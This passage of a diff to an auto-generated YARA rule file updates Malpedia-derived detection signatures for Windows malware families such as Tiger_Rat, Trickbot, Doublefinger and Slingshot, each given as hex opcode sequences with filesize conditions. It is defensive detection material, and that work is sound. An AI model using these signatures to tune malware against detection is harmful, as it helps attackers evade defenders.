c1ea06 } - $sequence_2 = { f6431920 0f84c7feffff 4983c101 e9???????? 4531c0 4889f2 89e9 } - $sequence_3 = { 8b45fc 4863c8 4889c8 48c1e002 4801c8 48c1e003 4889c1 } - $sequence_4 = { baafa96e5e 89c8 f7ea c1fa0b 89c8 c1f81f 29c2 } - $sequence_5 = { 8b45f8 4863d0 488b4510 4801d0 0fb600 0fb6d0 8b45f8 } - $sequence_6 = { e8???????? eb01 90 8b45f0 0faf45b8 89c2 488d45a0 } - $sequence_7 = { 85c0 74da 85db 4889742428 0f848d010000 8d4bff 488d742460 } - $sequence_8 = { c1e903 f348ab ff15???????? 83f812 7472 488b8b38020000 e8???????? } - $sequence_9 = { 5f 5d 415c 415d c3 b80d000000 ebd7 } + $sequence_0 = { 448bc6 442bc0 488b442450 488d0d65d30100 488b0cc1 4c8d4c244c 488d9520060000 } + $sequence_1 = { 4c89b590000000 c6858000000000 4883bde000000010 720c 488b8dc8000000 e8???????? 8bc7 } + $sequence_2 = { 90 488d4db8 e8???????? 48833d????????00 0f84b10c0000 } + $sequence_3 = { 488bcb ff15???????? ff15???????? 33ff 8bf0 0f1f8000000000 ff15???????? } + $sequence_4 = { 90 488d4db8 e8???????? 48833d????????00 0f84c0040000 488d157e170200 488d4db8 } + $sequence_5 = { 488bce ff15???????? 4885c0 7411 83caff 488bc8 } + $sequence_6 = { e9???????? 488d8af0000000 e9???????? 488b8a60000000 e9???????? 488d8a10010000 e9???????? } + $sequence_7 = { 0f8490000000 85db 0f8488000000 41880f 4b8b84e900670300 4183caff 4103da } + $sequence_8 = { 48ffc7 803c3a00 75f7 488d4c2450 4c8bc7 e8???????? 488d4c2450 } + $sequence_9 = { 48895dc8 c645b800 41b838000000 488d15b81d0200 488d4db8 e8???????? 90 } condition: - 7 of them and filesize <2369536 + 7 of them and filesize <497664 } -rule MALPEDIA_Win_Nightsky_Auto : FILE +rule MALPEDIA_Win_Tiger_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8aa7bf90-2e66-55fa-ac44-1eeed72fb6ec" + id = "c2ea69b5-54d0-5c61-bb49-4f65b838d0af" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightsky" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nightsky_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiger_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tiger_rat_auto.yar#L1-L165" license_url = "N/A" - logic_hash = "e63cd2d4ab9373a42087ae988b3e3adac99eadab50dc02b0732a77e7f3626d28" + logic_hash = "bed3ce3d252a7d616792a16e358ffda1357857c1fa2b5862a7f71cbabe456650" score = 75 quality = 75 tags = "FILE" @@ -137513,32 +140267,38 @@ rule MALPEDIA_Win_Nightsky_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 420fb68c1210ab0400 c1e108 0bc8 420fb6841212ab0400 } - $sequence_1 = { 4150 4d0fabe0 66442bc5 311424 6641d3e0 4158 4863d2 } - $sequence_2 = { 4883ec48 488364243000 8364242800 41b803000000 488d0dc0460000 4533c9 ba00000040 } - $sequence_3 = { 5f c3 488d05cf110000 48b90000000000000080 488987c8000000 488d0557990200 } - $sequence_4 = { e8???????? 488d15d92c0100 41b804010000 33c9 c605????????00 ff15???????? } - $sequence_5 = { 488d15d4be0000 41b898000000 498bd9 e8???????? 488b8424d0050000 488b9424e8050000 } - $sequence_6 = { e41d 1a5b5f a9b7f95f5f b8cbaa75cc d113 0ae4 } - $sequence_7 = { 0f8c96000000 3b1d???????? 0f838a000000 488bf3 4c8be3 49c1fc05 4c8d2d7e190100 } - $sequence_8 = { 488d0d0fda0000 480f45cf 48894b48 e8???????? eb17 4885ff 488d0dead90000 } - $sequence_9 = { 4883ec28 4c8bc1 4c8d0d52bbfdff 498bc9 } + $sequence_0 = { 4883c128 4889742448 48897c2450 ff15???????? } + $sequence_1 = { 0f11400c 488b4e28 488b5618 488b01 ff5010 } + $sequence_2 = { 4883c108 e8???????? 4d8b4618 41b901000000 } + $sequence_3 = { 33d2 41b80c000100 488bd8 e8???????? 4c63442430 488b4f08 } + $sequence_4 = { 4883c108 413bc0 7cef eb06 4898 } + $sequence_5 = { 4883c110 e8???????? 896e30 381f } + $sequence_6 = { 4883c10c e8???????? 488b4f28 488b5718 } + $sequence_7 = { 4883c110 48c741180f000000 33ed 48896910 408829 48c746500f000000 } + $sequence_8 = { 7ce0 488bce ff15???????? 8b0d???????? } + $sequence_9 = { ff15???????? 488bc8 ff15???????? ba0a000000 } + $sequence_10 = { 0b05???????? 8905???????? ff15???????? ff15???????? b9e8030000 8bd8 } + $sequence_11 = { 4c2bf3 8905???????? 493bf7 0f83c8000000 48896c2478 4c896c2430 41bd00f00000 } + $sequence_12 = { c705????????02000000 488905???????? 488d0556eb0100 48891d???????? 488905???????? 33c0 488905???????? } + $sequence_13 = { 8b05???????? 4d8bf4 2305???????? 4c03fe 4c2bf3 8905???????? } + $sequence_14 = { 4c8d35046c0100 49833cde00 7407 b801000000 eb5e } + $sequence_15 = { 8bd8 e8???????? 2bc3 3d70170000 7cf2 e8???????? } condition: - 7 of them and filesize <19536896 + 7 of them and filesize <557056 } -rule MALPEDIA_Win_Floki_Bot_Auto : FILE +rule MALPEDIA_Win_Byeby_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1cde0271-e319-5f49-b7d9-6126f8e6a662" + id = "74fc8a87-5c7b-524e-8e78-621f0d855f26" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.floki_bot_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.byeby_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "de31350a6a6eca83bc8efd1fc6e07ad972095e30f5b6c290e1bfd7b68f7ea01f" + logic_hash = "ea138eeca75e1ffbb323be9c4364fb51ef613b1a9fd77855f97073778ad7174f" score = 75 quality = 75 tags = "FILE" @@ -137552,32 +140312,32 @@ rule MALPEDIA_Win_Floki_Bot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff7508 e8???????? 83f8ff 7511 ff7518 ff7514 53 } - $sequence_1 = { 68???????? 53 89460c e8???????? 85c0 } - $sequence_2 = { c3 e8???????? 84c0 742c 56 ff15???????? 8bf0 } - $sequence_3 = { 53 e8???????? eb5e 8d45f4 99 8945b4 8b4508 } - $sequence_4 = { 83f840 7205 83c8ff eb63 56 6a04 8985fcfeffff } - $sequence_5 = { 3bd1 72f3 eb05 83faff 7527 8d7101 } - $sequence_6 = { e8???????? 83ffff 0f8472ffffff 3bfb 7404 c645fb00 8a45fb } - $sequence_7 = { 3b4e48 7612 ff7004 6a03 ff7644 51 ff10 } - $sequence_8 = { 56 6800040000 ff15???????? 8bf8 3bfe 0f8483000000 8d45e8 } - $sequence_9 = { 8bf7 e8???????? 8b7d0c 8b5d14 837d1000 742e 33c0 } + $sequence_0 = { e8???????? 68???????? 8d45f0 c745f0f4320110 } + $sequence_1 = { e8???????? 8b7df0 83c40c 037e74 c7467400000000 eb03 } + $sequence_2 = { 8bf0 53 ff742430 6a00 6a00 } + $sequence_3 = { 50 8b8528e5ffff 0f94c1 898d3ce5ffff 8b8d24e5ffff 8b048518ab0110 ff3401 } + $sequence_4 = { 8b8528e5ffff 8b048518ab0110 ff3401 ff15???????? 8bb540e5ffff 8bbd34e5ffff 85c0 } + $sequence_5 = { 8d84245c020000 50 c78424600200005630564d c78424640200005130394e ffd7 40 50 } + $sequence_6 = { 8b35???????? 8d442410 50 ff35???????? } + $sequence_7 = { 7309 8b04c5e84e0110 5d c3 33c0 } + $sequence_8 = { 0f8641010000 8b4c2420 83c714 8bff 837ff005 0f85fa000000 0fb707 } + $sequence_9 = { 3b0cc510900110 7427 40 83f82d 72f1 8d41ed } condition: - 7 of them and filesize <286720 + 7 of them and filesize <253952 } -rule MALPEDIA_Win_Aurora_Auto : FILE +rule MALPEDIA_Win_Sepsys_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6739f143-45de-5c25-aa97-f9c0ab868c7e" + id = "d155b3c0-24fe-546c-9cf6-d2f1eeec70b2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.aurora_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepsys" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sepsys_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "401b46f1e5d6c2d35e6c7ba88f463abdb92c79f1d47fd14fd19c66427ffd50ad" + logic_hash = "89f35a98ab7f5302d816a97393fda02a0779a3eb472a7bbe6cda60406ec5b6de" score = 75 quality = 75 tags = "FILE" @@ -137591,32 +140351,32 @@ rule MALPEDIA_Win_Aurora_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4e14 8945d4 8b4610 3bc1 7530 40 83f8fe } - $sequence_1 = { c645fc03 8d4dd8 837dec08 8d5dd8 } - $sequence_2 = { 8aca c0e206 0255d3 c0e902 80e10f } - $sequence_3 = { ebd9 837b1410 7202 8b1b } - $sequence_4 = { 3bf3 7469 897de8 c645fc01 85ff 7437 c7471000000000 } - $sequence_5 = { 6a00 c741140f000000 c7411000000000 68???????? c60100 e8???????? 8d8df8fbffff } - $sequence_6 = { 83793800 0f45c2 50 e8???????? 8b9df0feffff c745e40f000000 c745e000000000 } - $sequence_7 = { c785c8f1ffff0f000000 c785c4f1ffff00000000 c685b4f1ffff00 e8???????? 8d8dccf1ffff } - $sequence_8 = { 68???????? 8d8d24f1ffff c78538f1ffff0f000000 c78534f1ffff00000000 } - $sequence_9 = { 6a02 68???????? 8d8d14efffff c78528efffff0f000000 } + $sequence_0 = { eb00 c685b500000000 488b4df8 488b55e8 4c8b45f0 e8???????? 488955e0 } + $sequence_1 = { eb13 488b442448 4839442450 7407 b837000000 eb0e 488d4c2460 } + $sequence_2 = { e9???????? 0fb74b02 81f9e8030000 7338 41b801000000 6683f90a 723f } + $sequence_3 = { c685b604000000 488d8da0000000 e8???????? ebd8 488b4508 488d4d20 48894da8 } + $sequence_4 = { e8???????? 41b801000000 488d9424a0000000 488d8c24d8000000 e8???????? 488b442460 488b4008 } + $sequence_5 = { e8???????? 4889442430 488b442430 4889442450 488b542450 488b4c2438 e8???????? } + $sequence_6 = { 488b842400010000 4889842400020000 8b8c24c8010000 338c24f8010000 8b9424cc010000 339424fc010000 448b8424d0010000 } + $sequence_7 = { e8???????? 488945b0 eb00 488b45b0 48898518010000 eb0b 488b45b8 } + $sequence_8 = { d3e0 488b4c2430 89411c 4533c0 33d2 33c9 e8???????? } + $sequence_9 = { e8???????? 488b4c2430 ff15???????? 33d2 488d8c2460010000 e8???????? 4889442430 } condition: - 7 of them and filesize <827392 + 7 of them and filesize <4538368 } -rule MALPEDIA_Win_Farseer_Auto : FILE +rule MALPEDIA_Win_Qhost_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bdb1b674-d96e-50d4-8dbe-83cb253d9330" + id = "5a22ec0c-4f17-55ab-b241-2378f7015545" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.farseer_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.qhost_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "17f8792326231b41b2e91221ee87a535fdccf3e2e964ba78d0722fea338c91a0" + logic_hash = "c30effbf965ec02215e2576b89ba366bebeed097f08848009dcc3ab3b7556ec0" score = 75 quality = 75 tags = "FILE" @@ -137630,34 +140390,34 @@ rule MALPEDIA_Win_Farseer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d4c2434 e8???????? eb10 6a06 68???????? 8d4c2438 } - $sequence_1 = { 50 8d4c2440 51 8d542478 } - $sequence_2 = { e8???????? 8d742414 e8???????? 53 50 83c8ff 8d742438 } - $sequence_3 = { 8d442434 50 e8???????? c68424c402000002 8b8424cc000000 bb10000000 399c24e0000000 } - $sequence_4 = { 0f8c6cffffff 33ed 8d9424ac010000 68???????? 52 e8???????? 83c408 } - $sequence_5 = { 33db 6aff 899c2498000000 53 8d8424a4000000 be0f000000 50 } - $sequence_6 = { 7510 8bc1 eb0c 0fb6c9 0fbe8940454200 03c1 40 } - $sequence_7 = { 83c404 83bc24e402000010 7210 8b9424d0020000 52 e8???????? 83c404 } - $sequence_8 = { 85410c 7405 e8???????? 8d742440 e8???????? 85c0 } - $sequence_9 = { e9???????? 8bc3 c1f805 8d048520634200 83e31f 8985e4efffff 8b00 } + $sequence_0 = { c60000 8b4dfc 83e901 894dfc ebdc 8b4508 } + $sequence_1 = { 40 884598 8b0d???????? 51 e8???????? } + $sequence_2 = { ff15???????? 898550beffff c78538beffff00000000 837df400 } + $sequence_3 = { 7507 b805000080 eb36 8b5508 52 68???????? e8???????? } + $sequence_4 = { 03d0 52 ff15???????? 83c408 } + $sequence_5 = { 68???????? 68???????? 68ff030000 68???????? ff15???????? 83c410 } + $sequence_6 = { 837df800 0f84dc000000 c7854cbeffff00000000 c78550beffff00000000 eb1e } + $sequence_7 = { 68???????? 680f270000 68???????? ff15???????? 83c410 ff15???????? } + $sequence_8 = { 8bec 81ec6c0b0000 c785f0fdffff00000000 c785e8fdffff00000000 c785d4fdffff00000000 c745fc00000000 c785f4fdffff00000000 } + $sequence_9 = { 50 6800040000 8d8d00fcffff 51 8b95c8fbffff 52 } condition: - 7 of them and filesize <347328 + 7 of them and filesize <286720 } -rule MALPEDIA_Win_Trickbot_Auto : FILE +rule MALPEDIA_Win_Doublefinger_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7ca88b89-dbe0-5ca7-acaa-87de79bf1962" + id = "9629155b-05c7-5ae4-a87c-14586b484d59" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.trickbot_auto.yar#L1-L637" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefinger" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.doublefinger_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "e3adabeebcd43d3e3c9deb0d5c4eb46cb018beaf463780980939f5dd81bffcd5" + logic_hash = "1175dbcf7260ce52fd0cde8ae4e3d3c47c27ca77b65a7696e2bad6350a2d51d5" score = 75 - quality = 48 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -137669,99 +140429,32 @@ rule MALPEDIA_Win_Trickbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c002 eb0d 2500000080 f7d8 1bc0 83e007 40 } - $sequence_1 = { 1bc0 83e020 83c020 eb36 } - $sequence_2 = { eb36 2500000080 f7d8 1bc0 83e070 83c010 } - $sequence_3 = { f7d8 1bc0 83e002 83c002 eb0d } - $sequence_4 = { 83e070 83c010 eb25 a900000040 7411 2500000080 } - $sequence_5 = { 7429 a900000040 7411 2500000080 f7d8 1bc0 83e020 } - $sequence_6 = { 8b07 a900000020 7429 a900000040 } - $sequence_7 = { c705????????fdffffff c705????????feffffff c705????????ffffffff e8???????? } - $sequence_8 = { 895df4 895dec 66c745f00005 895dfc } - $sequence_9 = { 33ff 57 6880000000 6a02 57 6a01 68000000c0 } - $sequence_10 = { 41 83c028 3bce 7ce9 } - $sequence_11 = { 488b01 4c8b4120 488b5118 488b4910 } - $sequence_12 = { 53 6a03 53 6a01 6800010000 } - $sequence_13 = { 4889442428 488b4130 488b4910 4889442420 41ffd2 } - $sequence_14 = { 488b01 488b5118 488b4910 ffd0 } - $sequence_15 = { 4c8b4928 4c8b4120 488b5118 4889442438 488b4140 } - $sequence_16 = { 488b4148 4c8b11 4c8b4928 4c8b4120 } - $sequence_17 = { 4889442430 488b4138 4889442428 488b4130 } - $sequence_18 = { 488b5118 4889442440 488b4148 4889442438 488b4140 } - $sequence_19 = { 4889442438 488b4140 4889442430 488b4138 } - $sequence_20 = { 6820bf0200 68905f0100 68905f0100 50 ff15???????? } - $sequence_21 = { 2bc2 d1e8 03c2 c1e806 6bc05f } - $sequence_22 = { 83780400 7404 8b4008 c3 } - $sequence_23 = { 51 68e9fd0000 50 e8???????? } - $sequence_24 = { 6a40 6800300000 6a70 6a00 } - $sequence_25 = { 833800 751c 83781000 7516 } - $sequence_26 = { c3 6a01 ff15???????? 50 } - $sequence_27 = { 8b01 59 03d0 52 } - $sequence_28 = { 85c0 7f0b e8???????? 8b05???????? } - $sequence_29 = { 03d0 52 ebdc 89450c } - $sequence_30 = { 8bc1 66ad 85c0 741c } - $sequence_31 = { e8???????? 83f801 7411 ba0a000000 } - $sequence_32 = { 85c0 741c 3bc1 7213 } - $sequence_33 = { 7405 e8???????? ff15???????? 8bc3 } - $sequence_34 = { c1e102 2bc1 8b00 894508 } - $sequence_35 = { 50 8b450c ff4d0c ba28000000 } - $sequence_36 = { 895510 8b4a04 ff5508 8b5510 8b4a0c } - $sequence_37 = { 2bc1 8b00 3bc7 72f2 } - $sequence_38 = { 8b4a04 ff5508 50 51 } - $sequence_39 = { ff4d0c ba28000000 f7e2 8d9500040000 03d0 895510 } - $sequence_40 = { 740f 8bc8 e8???????? 8bc3 } - $sequence_41 = { 58 41 41 41 41 } - $sequence_42 = { 8bcf e8???????? 8bf0 85ed } - $sequence_43 = { 85c0 7911 8bc8 e8???????? bb11000000 } - $sequence_44 = { e8???????? 85c0 7507 e8???????? eb5b } - $sequence_45 = { 89742428 c744242000001f00 ff15???????? 85c0 7911 } - $sequence_46 = { 7c22 3c39 7f1e 0fbec0 } - $sequence_47 = { 3bd1 0f8293000000 038e8c000000 3bd1 0f8385000000 } - $sequence_48 = { ffc1 663938 75f5 6603c9 } - $sequence_49 = { ff15???????? 8bf0 c1ee1f 83f601 } - $sequence_50 = { 85d2 745b 3bd1 0f8293000000 } - $sequence_51 = { 41 50 2bc1 8b00 } - $sequence_52 = { 8bc8 33c0 85c9 0f95c0 eb02 } - $sequence_53 = { 894504 68f0ff0000 59 8bf7 8bd7 } - $sequence_54 = { 8bc7 e8???????? 85c0 0f849f000000 } - $sequence_55 = { 8bf7 8bd7 fc 8bc1 } - $sequence_56 = { 59 50 e2fd 8bc7 } - $sequence_57 = { 8dbf00500310 8bd6 897d08 3bc8 } - $sequence_58 = { 6a00 ff15???????? 6a00 6a00 6a00 8d45dc } - $sequence_59 = { 8b7d10 2bf9 53 50 } - $sequence_60 = { 83c001 8945d4 8b4dfc 51 8b55d4 } - $sequence_61 = { 8b4dd0 894dd8 837dd840 760b 8b55d8 } - $sequence_62 = { 8d3c0e 2b75f8 33c7 2bd0 ff4dfc 75ba 8b4508 } - $sequence_63 = { 42 42 3b5508 7202 8bd6 83c104 } - $sequence_64 = { bf31e7bf31 e7bf 31e7 bf31e7bf31 e7bf } - $sequence_65 = { 8b01 3302 52 8bd0 51 03cf 51 } - $sequence_66 = { 56 57 33f6 bf???????? 833cf594f3000101 } - $sequence_67 = { 8945cc ebee 8b45d8 48 50 8b45cc 40 } - $sequence_68 = { ff75f8 ff15???????? 8945fc 837dfc00 750d } - $sequence_69 = { 6a00 6858020000 ff15???????? 837dfc00 74ce } - $sequence_70 = { e8???????? 03c6 50 e8???????? 8b7710 83c40c 2bf3 } - $sequence_71 = { 55 8bec 83ec34 c745cc00000000 6a00 685b020000 6a00 } - $sequence_72 = { 42 42 8b01 83c202 33c3 890439 } - $sequence_73 = { 8945e4 3bc6 7305 8b750c } - $sequence_74 = { 9c 000f 9c 000f 9c f7a053f7a053 } - $sequence_75 = { 8bec e8???????? 8b4d08 e8???????? 5d c20400 } - $sequence_76 = { c705????????ad380001 8935???????? a3???????? ff15???????? a3???????? 83f8ff 0f84c1000000 } + $sequence_0 = { 4533c0 8b942458010000 488b4c2450 e8???????? 48898424c8020000 4533c0 8b94245c010000 } + $sequence_1 = { 89442428 8b442424 ffc8 89442424 } + $sequence_2 = { eb4b 4c8d057b820000 baeb030000 ff15???????? eb37 488d542420 ff15???????? } + $sequence_3 = { 0000 006689 442432 b845000000 6689442434 b84d000000 6689442436 } + $sequence_4 = { 894c2408 4883ec18 488d442420 4889442408 } + $sequence_5 = { 48898424c8010000 c744245c00000000 486344245c 488b8c24d0000000 } + $sequence_6 = { 4889442450 4533c0 8b9424c0010000 488b4c2450 e8???????? 48898424e8020000 } + $sequence_7 = { 33d2 488d41ff 4883f8fd 773c b84d5a0000 663901 } + $sequence_8 = { 488b00 ba01000000 488b4c2438 ff90b8000000 } + $sequence_9 = { ff9424c0000000 4889842480010000 b875000000 6689842400010000 b872000000 6689842402010000 } condition: - 7 of them and filesize <712704 + 7 of them and filesize <115712 } -rule MALPEDIA_Win_Tmanger_Auto : FILE +rule MALPEDIA_Win_Albaniiutas_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "78f3e107-dd73-5ac6-8162-9004595db040" + id = "59f4d909-2fdf-5b2b-b2d0-e08828d007ee" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tmanger" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tmanger_auto.yar#L1-L115" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.albaniiutas" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.albaniiutas_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "3ce75b695b98335702f80c133e38f084863185b63bd0e2de7bf59d414a1dae17" + logic_hash = "121e552bf42e7769ddf3d97832d0aa4668207291feb4416fe4bffab1efac2c40" score = 75 quality = 75 tags = "FILE" @@ -137775,34 +140468,34 @@ rule MALPEDIA_Win_Tmanger_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c7415d382cd7bd c74161d47bdb0f c741651f013f62 c74169388b8e92 c7416d9b14f6a0 } - $sequence_1 = { c741103a71c135 c74114c2a02ab0 c74118d95dc845 c7411cf8f0564e c7412066b8276e } - $sequence_2 = { c74169388b8e92 c7416d9b14f6a0 c7417180fcd6bb c74175d7401d36 } - $sequence_3 = { c7410c16d9fdf8 c741103a71c135 c74114c2a02ab0 c74118d95dc845 c7411cf8f0564e } - $sequence_4 = { c7412425d933d1 c7412861fdc72a c7412cdf9134d2 c74130324d251d c74134375ec19d } - $sequence_5 = { c74169388b8e92 c7416d9b14f6a0 c7417180fcd6bb c74175d7401d36 c7417958fffa19 66c7417dfc19 } - $sequence_6 = { c7412066b8276e c7412425d933d1 c7412861fdc72a c7412cdf9134d2 c74130324d251d c74134375ec19d } - $sequence_7 = { c741594d68b93a c7415d382cd7bd c74161d47bdb0f c741651f013f62 } - $sequence_8 = { c741510f9f2997 c7415565449eac c741594d68b93a c7415d382cd7bd c74161d47bdb0f c741651f013f62 } - $sequence_9 = { c741594d68b93a c7415d382cd7bd c74161d47bdb0f c741651f013f62 c74169388b8e92 } + $sequence_0 = { c745f800000000 50 8bf2 c745f400000000 8bf9 } + $sequence_1 = { c1f906 6bc030 03048d90df0210 50 ff15???????? 5d c3 } + $sequence_2 = { 23c1 eb57 53 8b1c85c8540110 } + $sequence_3 = { c705????????01000000 c705????????01000000 6a04 58 6bc000 c7806cda021002000000 6a04 } + $sequence_4 = { 59 83cfff 897de4 8365fc00 8b049d90df0210 8b4de0 f644082801 } + $sequence_5 = { 898850030000 8b4508 59 c74048c0a40110 8b4508 6689486c } + $sequence_6 = { 68???????? ffd6 68???????? 8d45d4 c745d400000000 50 e8???????? } + $sequence_7 = { 83e801 0f8580000000 8b4508 dd00 ebc6 c745e0f87c0110 } + $sequence_8 = { 660fd60f 8d7f08 8b048dd46a0010 ffe0 f7c703000000 7413 } + $sequence_9 = { 33048dc01c0110 0fb6ca 33048dc0280110 ff4d08 0f8502feffff 83ff04 } condition: - 7 of them and filesize <8252416 + 7 of them and filesize <566272 } -rule MALPEDIA_Win_Playwork_Auto : FILE +rule MALPEDIA_Win_Slingshot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "18efebc1-2ecf-5ebd-a5ef-f5649e46ba89" + id = "bf558dcd-c863-525d-b34a-1a56d33f94ec" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.playwork_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.slingshot_auto.yar#L1-L218" license_url = "N/A" - logic_hash = "a4351b5bd2d1c3d515bb6fc22faeca44797e61833bdb6ed02e20384700f78521" + logic_hash = "1e413348df71e72118297c6913e2a6da9548aa658d39b7dcd425460f21f929c0" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -137814,32 +140507,45 @@ rule MALPEDIA_Win_Playwork_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { a801 7410 e8???????? 6a1a 99 59 } - $sequence_1 = { 3350fc 0fb6c9 8bf2 c1ee18 } - $sequence_2 = { 68???????? eb48 68???????? eb41 68???????? 8d85e8f7ffff 68???????? } - $sequence_3 = { 8b5008 89560c 8b500c 83e904 895610 0f8469010000 } - $sequence_4 = { 3dea000000 0f850e020000 8b5dfc 85db } - $sequence_5 = { 8bdf c1eb10 3330 83c010 8975dc 0fb6f3 } - $sequence_6 = { 8b4014 894618 8d4e1c c1c808 8bd8 8bd0 } - $sequence_7 = { 03c8 81f9ffff0000 7d04 56 53 ffd7 56 } - $sequence_8 = { 8d8594f7ffff 50 8d85f4fdffff 50 ff15???????? } - $sequence_9 = { 0fb6db 3370fc 8bce 8975f8 c1e918 8b3c8d34573f00 8b4df0 } + $sequence_0 = { 50 33db 53 ff15???????? 8bf0 3bf3 } + $sequence_1 = { 3bcb 7512 ff7708 ff37 } + $sequence_2 = { 48 8bf0 66895804 66897806 85ed } + $sequence_3 = { e8???????? e8???????? 8945d8 8955dc 3bc3 7d09 52 } + $sequence_4 = { e8???????? ff7004 8d742420 ff30 e8???????? 395c241c 7523 } + $sequence_5 = { 8be8 49 3bc6 750f baec040000 b90e000780 } + $sequence_6 = { e8???????? 59 8d75a4 e8???????? 8d7594 } + $sequence_7 = { 3bcb 7442 395dfc 7414 } + $sequence_8 = { 3bcb 7504 6a08 eb7a } + $sequence_9 = { 3919 740a 48 83c102 48 83e801 75f0 } + $sequence_10 = { 833d????????00 7546 b918000000 e8???????? 48 } + $sequence_11 = { 0f848a050000 45 33e4 0fb74c2448 83e961 } + $sequence_12 = { 3bcb 7552 dd45f0 dd4720 } + $sequence_13 = { 8bce 49 3bfe 741a } + $sequence_14 = { 59 c20400 8b4608 83f8ff } + $sequence_15 = { 3bcb 7461 8b01 83f807 } + $sequence_16 = { 3bcb 753c ff7708 eb28 } + $sequence_17 = { eb29 48 8d4c2448 e8???????? } + $sequence_18 = { e9???????? 8d85d0fdffff 50 ff15???????? } + $sequence_19 = { 894c9a08 8b5df8 03cb 8b5d0c 23c8 } + $sequence_20 = { ff7508 ffd7 85c0 7516 ff15???????? 6843458a04 } + $sequence_21 = { 0d00000780 8906 e8???????? 48 8bd6 48 } + $sequence_22 = { 3bcb 743b 6afe 58 8901 } condition: - 7 of them and filesize <360448 + 7 of them and filesize <663552 } -rule MALPEDIA_Win_Artra_Auto : FILE +rule MALPEDIA_Win_Hyperssl_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e3b6f047-fdc2-51fa-b830-434c73cd7acb" + id = "2b769147-d4c5-504a-a0e4-deff8d9a685b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.artra" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.artra_auto.yar#L1-L244" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperssl" + source_url = 